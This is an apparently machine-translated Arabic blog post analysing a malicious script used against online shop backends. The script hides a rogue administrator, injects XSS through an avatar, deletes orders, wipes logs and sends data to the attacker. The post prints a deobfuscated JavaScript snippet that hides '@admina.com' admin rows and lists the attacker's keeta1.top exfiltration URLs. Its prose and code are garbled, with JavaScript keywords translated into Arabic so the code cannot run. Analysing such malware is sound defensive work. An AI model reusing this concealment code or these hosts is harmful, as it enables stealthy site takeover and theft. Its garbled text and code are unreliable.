مقدمة

والسبب في تزايد كثافة عمليات الشراء الأخيرة التي تستهدف الثغرات التي تستهدف مغايرة في الآونة الأخيرة هو أن المؤلفين لم يحموا مواقعهم الإلكترونية بشكل صحيح. وفقًا لمستخدمي الإنترنت المتحمسين بالإضافة إلى البرنامج النصي لاستغلال الثغرات الأمنية التي تم التقاطها الخاصة بهم، وبالتالي كتابة سلسلة مقالات تحليلية. مؤلف هذا المقال النص البرمجي للثغرة النصية، واستخدام رمز xss حقن الصورة الرمزية الحقن، ثم استخدام خوف المسؤول من التعرض للاختراق لعرض سجلات الخلفية النفسية، المصممة لتنفيذ التعليمات البرمجية الخبيثة في هذا الوقت، وذلك لتحقيق استخدام سلطة المسؤول لتحقيق الغرض من الشراء الصفري.

إن السبب في تزايد كثافة عمليات الشراء التي تستهدف الثغرات في الآونة الأخيرة هو فشل المؤلف في حماية موقعه الإلكتروني بشكل صحيح. واستنادًا إلى المستخدمين المتحمسين ونصوص استغلال الثغرات التي تم التقاطها، نكتب سلسلة المقالات التحليلية هذه.
هناك شيء واحد يمكن أن يقال عن عدم الخوف من التعرض للاختراق طالما أنك لا تملك أي دخل يومي ولا بطاقات.

نعلن بموجب هذه الوثيقة#

لمنع المزيد من الاستغلال الخبيث، تم طمس جميع التعليمات البرمجية والأوصاف الواردة في هذا المنشور.

الخطوط العريضة#

هذا المقال مؤلف البرنامج النصي للثغرات البرمجية، واستخدام رمز xss حقن الصورة الرمزية للحقن، ثم استخدام خوف المسؤول من التعرض للاختراق لعرض سجلات الخلفية لعلم النفس، وتصميم التعليمات البرمجية الخبيثة في هذا الوقت للتنفيذ، وذلك لتحقيق استخدام سلطة المسؤول لتحقيق الغرض من الشراء الصفري.

تشريح الكود#

عنوان البرنامج النص البرمجي الخبيث

https://jiaoben.keeta1.top/

قمت بتنزيله ووجدت أنه معتم، وإزالة التعتيم بسيطة.
لا يتم عرض العملية، يتم فك تشفير الكود التالي إلى مستوى قابل للقراءة فقط لمنع الاستغلال.
الهيكل العام على النحو التالي

ابدأ بإضافة مسؤول يحمل الرمز @admina.com

$("td")["كل"](الدالة (_0x36ba71, _0x348775) {
	console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
  إذا (إذا (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
    var _0x53991d = $(this)["الأصل"]();
    _0x53991d["remove"]().
  }
})

تتمثل الفكرة في تكرار جميع الجداول وإذا وجد أن الجدول يحتوي على قيمة تحتوي على @admina.com، فقم بإزالة العنصر الأصل الخاص به.
يحدث فقط أن قائمة المسؤولين عبارة عن جدول، بحيث يمكن إخفاء المسؤول الذي يحتوي على @admina.com. هذا يعني أن المسؤول غير مرئي في الواجهة الخلفية على الإطلاق، ولكن فقط في قاعدة البيانات.

بعد تشغيل النتائج على النحو الوارد أعلاه، اختفت الإدارة.
العيب الوحيد هو أن السطر السفلي، "إظهار السجلات من 1 إلى 1، إجمالي 1 سجلات"، يجب أن يتم تخفيضه بمقدار واحد. وإلا فإنه لا يعمل.
ثم هناك وظيفة المخترق الرئيسي.

أولاً وقبل كل شيء، وفقًا للعنوان لتحديد ما إذا كانت واجهة سجل العمليات في الخلفية
سيتم بعد ذلك تمكين مؤقت لتنفيذ التعليمات البرمجية الخبيثة.
لن يتم تنفيذ الشيفرة البرمجية الخبيثة في المؤقت إذا لم تكن في واجهة مشغل التسجيل في الخلفية.

اطلب أولاً البطاقة للعثور على معرف المستخدم الذي يحمل اسم المستخدم toptoones
ثم، بناءً على المعرف الذي تم إرجاعه، قم بما يلي

حذف هذا المستخدم أولاً
ثم قم باستدعاء المكون الإضافي تدمير الطلب لتدمير طلب المستخدم.

إذا لم يكن هذا المكون الإضافي مثبتًا لديك، فسيكون هذا المكون الإضافي القديم 6 مدروسًا أيضًا لاستدعاء واجهة برمجة التطبيقات لمساعدتك في التنزيل من متجر المكونات الإضافية، وتفعيل المكون الإضافي، وإتلاف الطلب، وإغلاق المكون الإضافي، وإلغاء تثبيت المكون الإضافي، وبالمناسبة لمساعدتك في مسح سجلات الخلفية.

ثم سيحقن الرمز من الصورة الرمزية للمشرف حيث يقول في البداية أنه يخفي المشرف الخبيث، بحيث بمجرد تسجيل الدخول إلى الواجهة الخلفية سيتم تشغيل الرمز الخبيث.
وسيقوم بعد ذلك بتحميل معلوماتك إلى واجهته الخلفية.

https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp

ثم سيتحقق مما إذا كان هناك مكون إضافي للدفع السهل في الواجهة الخلفية ويحقن التعليمات البرمجية إذا كان هناك. أعتقد أنه كان يجب أن أحاول تغيير تهيئة الدفع، ولكنني لم أفعل لسبب ما، وربما سأتابع الترقية.

كما أنه يتعامل مع الحراسة الخلفية بعناية فائقة
وأخيراً، هناك كل أنواع مسح السجلات ونقل البيانات.

الملخصات

التنازلتخيل(بين الأبعاد)
رؤية الواقع
احصل على فرشاة شعر مختلفة، لم يظهر المؤلف حتى.